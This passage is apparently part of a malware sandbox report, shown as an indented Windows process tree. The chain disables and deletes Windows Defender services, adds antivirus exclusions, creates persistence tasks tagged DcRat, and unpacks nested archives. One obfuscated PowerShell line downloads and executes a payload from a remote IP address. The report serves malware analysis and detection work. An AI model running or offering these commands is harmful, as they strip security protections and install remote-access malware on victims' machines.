                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                    11⤵
                                                                                                                      PID:4748
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc stop WinDefend
                                                                                                                      11⤵
                                                                                                                        PID:4792
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc stop WdNisDrv
                                                                                                                        11⤵
                                                                                                                          PID:4044
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc stop WdNisSvc
                                                                                                                          11⤵
                                                                                                                            PID:4536
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc stop WdFilter
                                                                                                                            11⤵
                                                                                                                              PID:4780
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              sc stop WdBoot
                                                                                                                              11⤵
                                                                                                                                PID:1404
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                11⤵
                                                                                                                                  PID:5212
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:4488
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    11⤵
                                                                                                                                      PID:5452
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:2964
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:2312
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:1636
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:5424
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:5836
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:2752
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                  11⤵
                                                                                                                                                    PID:2120
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 2
                                                                                                                                                    11⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:1332
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                    Power.exe Regedit.exe /S Offer.reg
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5264
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg
                                                                                                                                                        12⤵
                                                                                                                                                          PID:2496
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg
                                                                                                                                                            13⤵
                                                                                                                                                              PID:5316
                                                                                                                                                              • C:\Windows\Regedit.exe
                                                                                                                                                                "C:\Windows\Regedit.exe" /S Offer.reg
                                                                                                                                                                14⤵
                                                                                                                                                                • Runs .reg file with regedit
                                                                                                                                                                PID:4108
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f
                                                                                                                                                          11⤵
                                                                                                                                                            PID:4308
                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                            sc delete SgrmBroker
                                                                                                                                                            11⤵
                                                                                                                                                              PID:5240
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc delete SgrmAgent
                                                                                                                                                              11⤵
                                                                                                                                                                PID:5340
                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                sc delete SecurityHealthService
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:4844
                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                  sc delete WdBoot
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:4164
                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                    sc delete WdFiltrer
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:4972
                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                      sc delete WdNisSvc
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:3544
                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                        sc delete WdNisDrv
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:3900
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc delete wscsvc
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:3396
                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                            sc delete Sense
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4716
                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                              sc delete WinDefend
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:4152
                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                timeout /t 2
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:5056
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:5900
                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:5956
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:3968
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:1336
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:5236
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:2192
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:3716
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:2744
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:5724
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\OneDrive\Drive.exe
                                                                                                                                                                                                    Drive.exe
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:4736
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:5132
                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:5392
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                            PID:6096
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:4008
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe"
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:3376
                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    C:\Windows\System32\conhost.exe wjzmhxaceqz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7071LQ7krggxA/UnVAaiocMjg0W1H5yAsWgrQR/11zt7RRg3ZnxBodCtMBKiY6+h9La4/jA7nc9BcXwzk8+WkGkxNBMC7OGlDKj9rOiTQ/TOxoHyWdibvyBbcnCZiKPxB8iibCz9eqCXI7CHageLKU6YJPTRFLen1ePs/tUv7hCEAIVa5jfPO/y1Z4uyViDjd5hg2gMd7UuClJ+CBHAOYUVsH8w1ma5UC3dsohG2flQxaKhHOaDpp5ELr7DD/0MGPcTCx4O3hoEDL/m+UtWA6Qj3vGo+MsusQ4bNf46gR3oRP951wrLt7MHk+nkdjBgVoC5qv8B33n5lfVldrIlXKY5U377OV/MbG7Ue/212cYr
                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                      PID:5788
                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5788 -s 408
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5976
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                timeout /t 4
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:5160
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:3848
                                                                                                                                                                                                    • C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:4900
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 432
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:4944
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 440
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:6120
                                                                                                                                                                                                    • C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:1600
                                                                                                                                                                                                    • C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5004
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 432
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 452
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                    • C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                      PID:4588
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:4272
                                                                                                                                                                                                          • C:\Windows\system32\mode.com
                                                                                                                                                                                                            mode 65,10
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:5232
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e file.zip -p320791618516055 -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:5880
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:5508
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:5928
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:3404
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:1060
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:3796
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:2560
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:620
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                                                                                              7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:316
                                                                                                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                                                                                                              attrib +H "Result_protected.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                              PID:776
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
                                                                                                                                                                                                              "Result_protected.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                              PID:4168
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:1448
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:5384
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      PID:1612
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\222.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\222.exe"
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5328
                                                                                                                                                                                                          • C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5044
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 432
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:4840
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 452
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:5860
                                                                                                                                                                                                          • C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                            PID:1328
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                  taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:6008
                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:4544
                                                                                                                                                                                                            • C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:3376
                                                                                                                                                                                                              • C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                PID:1332
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 1628
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:3700
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 2056
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:1612
                                                                                                                                                                                                              • C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:1612
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                • C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4820
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSB515.tmp\Install.exe
                                                                                                                                                                                                                    .\Install.exe
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5136
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB8B.tmp\Install.exe
                                                                                                                                                                                                                      .\Install.exe /S /site_id "525403"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      PID:5696
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:5124
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                            PID:3376
                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:2540
                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
